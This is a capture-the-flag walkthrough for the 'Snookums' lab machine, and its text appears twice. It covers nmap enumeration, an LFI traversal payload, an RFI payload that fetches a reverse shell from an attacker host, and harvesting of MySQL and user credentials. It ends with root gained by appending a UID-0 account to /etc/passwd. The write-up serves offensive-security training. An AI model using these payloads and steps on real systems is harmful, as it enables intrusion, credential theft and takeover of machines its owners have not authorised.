Snookums

Privilege Escalation via writable /etc/passwd

Summary

FTP allowed anonymous login but directory listing failed.
Apache server hosted vulnerable Simple PHP Photo Gallery v0.8.
LFI and RFI exploits led to remote code execution via PHP reverse shell.
MySQL DBPASS for root found in webroot PHP config.
Credentials for local users recovered via double base64 decoding from MySQL.
Privilege escalation achieved by abusing write access to /etc/passwd.

🧵 Let's Unpack

🔎 Enumeration

nmap -p- 192.168.167.58
sudo nmap -A -T4 -sC -sN -oN nmapFull -p 21,22,80,111,139,445,3306,33060 192.168.167.58

FTP: vsftpd 3.0.2 allowed anonymous login (but no directory listing)
HTTP: Apache 2.4.6 hosted Simple PHP Photo Gallery v0.8
MySQL open on 3306 (unauth)
Samba, RPCBind, and SSH present

⚡ Initial Foothold

Used LFI to read /etc/passwd and RFI to execute PHP shell

# LFI
index.php?preview=box.png%00../../../../../../../../../../../../etc/passwd%00

# RFI
image.php?img=http://<attacker-ip>/reverse_shell.php

Reverse shell connection received, gained shell access

python -c 'import pty; pty.spawn("/bin/bash")'

🔐 Credential Extraction

Found db_config.php in /var/www/html:

define('DBUSER', 'root');
define('DBPASS', 'MalapropDoffUtilize1337');

Logged into MySQL using:

mysql -u root -p

>
show databases;
use <tableName>
show tables;

select * from tables;
# got creds of 3 users
+----------+----------------------------------------------+
| username | password                                     |
+----------+----------------------------------------------+
| josh     | VFc5aWFXeHBlbVZJYVhOelUyVmxaSFJwYldVM05EYz0= |
| michael  | U0c5amExTjVaRzVsZVVObGNuUnBabmt4TWpNPQ==     |
| serena   | VDNabGNtRnNiRU55WlhOMFRHVmhiakF3TUE9PQ==     |
+----------+-------------------------------------------

# Decoding password;
SELECT username, CONVERT(FROM_BASE64(password), CHAR) FROM users;

Extracted user credentials from users table (double base64 encoded):

SELECT username, CONVERT(FROM_BASE64(FROM_BASE64(password)), CHAR) FROM users;

michael: HockSydneyCertify123
josh: MobilizeHissSeedtime747
serena: OverallCrestLean000

Decoded credentials:
- michael : HockSydneyCertify123
- josh : MobilizeHissSeedtime747
- serena : OverallCrestLean000
SSH login as michael successful

🪜 Privilege Escalation

michael had write access to /etc/passwd
Added root user manually using crafted password hash:

openssl passwd -1 -salt dhawan dhawan1337
# $1$dhawan$XHPP5JzvM1sM17BmwzpJ31

echo 'dhawan:$1$dhawan$XHPP5JzvM1sM17BmwzpJ31:0:0::/root:/bin/bash' >> /etc/passwd
su dhawan
# Password: dhawan1337

Gained root shell 🎉

PreviousPayday NextBratarina

Last updated 1 month ago

Was this helpful?

Snookums

Privilege Escalation via writable /etc/passwd

Summary

FTP allowed anonymous login but directory listing failed.
Apache server hosted vulnerable Simple PHP Photo Gallery v0.8.
LFI and RFI exploits led to remote code execution via PHP reverse shell.
MySQL DBPASS for root found in webroot PHP config.
Credentials for local users recovered via double base64 decoding from MySQL.
Privilege escalation achieved by abusing write access to /etc/passwd.

🧵 Let's Unpack

🔎 Enumeration

nmap -p- 192.168.167.58
sudo nmap -A -T4 -sC -sN -oN nmapFull -p 21,22,80,111,139,445,3306,33060 192.168.167.58

FTP: vsftpd 3.0.2 allowed anonymous login (but no directory listing)
HTTP: Apache 2.4.6 hosted Simple PHP Photo Gallery v0.8
MySQL open on 3306 (unauth)
Samba, RPCBind, and SSH present

⚡ Initial Foothold

Exploited on Simple PHP Photo Gallery
Used LFI to read /etc/passwd and RFI to execute PHP shell

# LFI
index.php?preview=box.png%00../../../../../../../../../../../../etc/passwd%00

# RFI
image.php?img=http://<attacker-ip>/reverse_shell.php

Reverse shell connection received, gained shell access

python -c 'import pty; pty.spawn("/bin/bash")'

🔐 Credential Extraction

Found db_config.php in /var/www/html:

define('DBUSER', 'root');
define('DBPASS', 'MalapropDoffUtilize1337');

Logged into MySQL using:

mysql -u root -p

>
show databases;
use <tableName>
show tables;

select * from tables;
# got creds of 3 users
+----------+----------------------------------------------+
| username | password                                     |
+----------+----------------------------------------------+
| josh     | VFc5aWFXeHBlbVZJYVhOelUyVmxaSFJwYldVM05EYz0= |
| michael  | U0c5amExTjVaRzVsZVVObGNuUnBabmt4TWpNPQ==     |
| serena   | VDNabGNtRnNiRU55WlhOMFRHVmhiakF3TUE9PQ==     |
+----------+-------------------------------------------

# Decoding password;
SELECT username, CONVERT(FROM_BASE64(password), CHAR) FROM users;

Extracted user credentials from users table (double base64 encoded):

SELECT username, CONVERT(FROM_BASE64(FROM_BASE64(password)), CHAR) FROM users;

michael: HockSydneyCertify123
josh: MobilizeHissSeedtime747
serena: OverallCrestLean000

Decoded credentials:
- michael : HockSydneyCertify123
- josh : MobilizeHissSeedtime747
- serena : OverallCrestLean000
SSH login as michael successful

🪜 Privilege Escalation

michael had write access to /etc/passwd
Added root user manually using crafted password hash:

openssl passwd -1 -salt dhawan dhawan1337
# $1$dhawan$XHPP5JzvM1sM17BmwzpJ31

echo 'dhawan:$1$dhawan$XHPP5JzvM1sM17BmwzpJ31:0:0::/root:/bin/bash' >> /etc/passwd
su dhawan
# Password: dhawan1337

Gained root shell 🎉

PreviousPayday NextBratarina

Last updated 1 month ago

Was this helpful?